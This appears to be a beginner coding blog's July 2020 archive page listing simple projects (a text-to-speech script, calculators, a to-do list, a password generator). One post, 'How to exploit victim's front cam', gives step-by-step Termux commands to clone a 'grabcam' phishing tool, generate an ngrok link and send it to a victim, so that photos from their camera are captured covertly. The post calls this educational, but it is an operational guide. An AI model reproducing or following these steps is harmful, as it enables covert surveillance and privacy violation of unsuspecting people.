Posts

Showing posts from July, 2020

GENERATE TEXT TO SPEECH USING PYTHON

GENERATE TEXT TO SPEECH USING PYTHON REQUIREMENTS : GTTS : GOOGLE TEXT TO SPEECH,THIS CAN BE INSTALLED IN PYTHON BY  USING (   gtts ). PLAY SOUND : PLAY THE AUDIO FILE GENERATED BY GTTS MODULE ( playsound   ) SOURCE CODE: Note : The Audio file will be saved in the same directoy of the program Any Queries Comment Down Below 👇

HOW TO EXPLOIT VICTIM'S FRONT CAM

Image
EXPLOIT VICTIM FRONT CAM This a small trick to capture victims pic using vicims camera.             We use TERMUX app in our mobile and run some commands from  it.             It is for Educational Purpose ONLY. Step1 : Download Termux app from playstore. Step2 : After installation of termux app in your device                             Now Follow This Step's: $apt upgrade $apt update $pkg install git $pkg install wget $pip install lolcat $git clone https://github.com/noob-hacckers/grabcam $cd $ls $cd grabcam $ls $cd grabcam NOW, The Code will start execution You wil get two options like 01 servo.net 02 ngrok Now turn on your hotspot until the process complete's. Now, give the option as 2 and click enter Now,the link will be generated.Send that link to the victim and if the victim clicks the link,the victims cam file will be recieved to y...

TO DO LIST

Image
TO DO LIST      This project helps you to remember the things you have to do in a day.      This can be help full to make you sucessfull in your life.      This project is build by using HTML,CSS and JAVA SCRIPT Source Code :     HTML :     CSS  :     JAVASCRIPT   :     Comment Down your views below 👇

LOVE CALCULATOR

Image
LOVE CALCULATOR Love Calculator is a simple project in HTML5, CSS, and JavaScript. This is interesting project made for fun. This project is for finding the compatibility calculations between two peoples. Also, you can see the basic features of the love calculator in this project. This Calculator project is simply in HTML, CSS, and JavaScript. Taking about the features of the Calculator, the user can check their compatibility with other people(crush) and see if they are made for each other. So, you can just type your name and the next name with whom you want to find the compatibility in love calculations and click the fireball button for the result. Source Code :     HTML :     CSS  :     JAVASCRIPT   :     Comment Down your views below 👇

STOP CLOCK GENERATOR

Image
STOP CLOCK GENERATOR How to use  HTML , CSS, JavaScript, SQL, PHP, Python, Bootstrap, Java and XML. The clearTimeout() method clears a  timer  set with the setTimeout() method  button to start a  timer , an input field that will count forever, and a " Stop  count! Source Code :     HTML :     CSS  :     JAVASCRIPT   :     Comment Down your views below 👇

FLAMES CALCULATOR

FLAMES CALCULATOR                         Do you know what type relation you have with your dear ones ?                         Check out here with the name of your loved Ones .                         Give us a Thumb  👍 if you like it 😉 Source Code :     HTML :     CSS  :     JAVASCRIPT   :     To play with this check out  this  link     Comment Down your views below 👇

TECHNICAL QUIZ

Image
    TECHNICAL QUIZ                     Many programmers and web developers alike will agree that when                                    deciding to enter the field of computing, learning one of the essential                               coding languages out there, HTML will give you a good starting point. In                        this quiz, we’re going to put you on test against a host of questions                                  regarding the basics of the language, its protocols, and correct layout.              ...

RANDOM PASSWORD GENERATOR USING HTML,CSS AND JAVASCRIPT

Image
RANDOM PASSWORD GENERATOR USING  HTML,CSS AND JAVA SCRIPT The task is to generate a random password that may consist of alphabets, numbers, and special characters. This can be achieved in various ways in this article we will discuss the most popular two methods which are discussed below to solve the problem. Source Code :     HTML :     CSS  :     JAVASCRIPT   :     Note :  To use this go to  this  link        Comment Down your views below 👇

WEB CALCULATOR

Image
WEB CALCULATOR Basic JavaScript Calculator Source Code | HTML, CSS:   Do you ever think what you can do using Javascript? Javascript lets you do all that you will never have thought about.  At this time JavaScript is one of the most demanding languages. You will find this calculator programs on a very well-known website like CodePen, but those programs will be very advanced. If you are a beginner or are looking for  simple code , then those codes will be difficult for you to understand. I will show you how to make a  calculator  using  JavaScript , HTML & CSS. I.e. will share the source code of JavaScript calculator.  This is very simple but useful program. When I started learning java script, in the second class I expressed my desire to learn this from my teacher. Source Code :     HTML :     CSS  : ...